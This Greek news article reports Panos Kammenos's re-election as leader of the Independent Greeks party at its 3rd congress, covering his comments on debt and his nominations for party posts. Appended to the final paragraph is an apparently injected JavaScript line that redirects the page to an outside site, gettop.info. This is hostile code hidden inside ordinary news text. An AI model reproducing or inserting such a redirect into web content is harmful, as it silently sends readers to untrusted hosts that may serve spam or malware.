Επανεξελέγη πρόεδρος των ΑΝΕΛ ο Π. Καμμένος: Ήλθε η ώρα να δικαιωθούμε

0
7

 

Διά βοής και διά ψηφοφορίας επανεξελέγη πρόεδρος των Ανεξάρτητων Ελλήνων ο Πάνος Καμμένος, ο οποίος στη νολιμία του στο 3ο Συνέδριο του κόμματός του υπογράμμισε ότι «στις επόμενες μέρες, μήνες και ώρες θα δικαιωθούμε για την πολιτική μας».

Είπε ότι η χώρα μπαίνει στον δρόμο εξόδου από τα μνημόνια, τους δανειστές, τις υποδείξεις, τη φτώχεια, την ανεργία και το χρέος. Ειδικά για το χρέος επανέλαβε την πάγια θέση των ΑΝΕΛ για διαγραφή του, προσθέτοντας: «Ήλθε η ώρα να δικαιωθούμε».

Ο κ. Καμμένος χαρακτήρισε το 3ο Συνέδριο των ΑΝΕΛ ως το πλέον παραγωγικό, προσθέτοντας ότι ήλθε η ώρα να ανοίξουν οι Ανεξάρτητοι Έλληνες τις πόρτες τους στους νέους ανθρώπους και να γίνουν κίνημα πλειοψηφίας.

Επιπλέον, ζήτησε από το Σώμα να εγκρίνει την πρότασή του για ανάδειξη του Παναγιώτη Σγουρίδη στη θέση του αντιπροέδρου του κόμματος.

Ταυτόχρονα, και επισημαίνοντας ότι η παρέμβασή του οφείλεται στο γεγονός ότι «τις τελευταίες ημέρες κάποιοι επιχείρησαν να μετατρέψουν το εσωτερικό των ΑΝΕΛ σε πεδίο μάχης με αφορμή τη θέση του γενικού γραμματέα» πρότεινε για τη θέση αυτή τον Θύμιο Δρόσο.

«Αυτό δεν σημαίνει ότι δεν θα εμπλακούν όλοι όσοι θέλουν στις εσωτερικές μας διαδικασίες, αλλά θα εμπλακούν με όρους αλληλεγγύης, θα εμπλακούν όλοι αλλά χωρίς ομάδες, γκρούπ ή παρέες» επεσήμανε ο κ. Καμμένος ο οποίος προσέθεσε ότι η πρότασή του δεν συνιστά παραβίαση του Καταστατικού των ΑΝΕΛ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here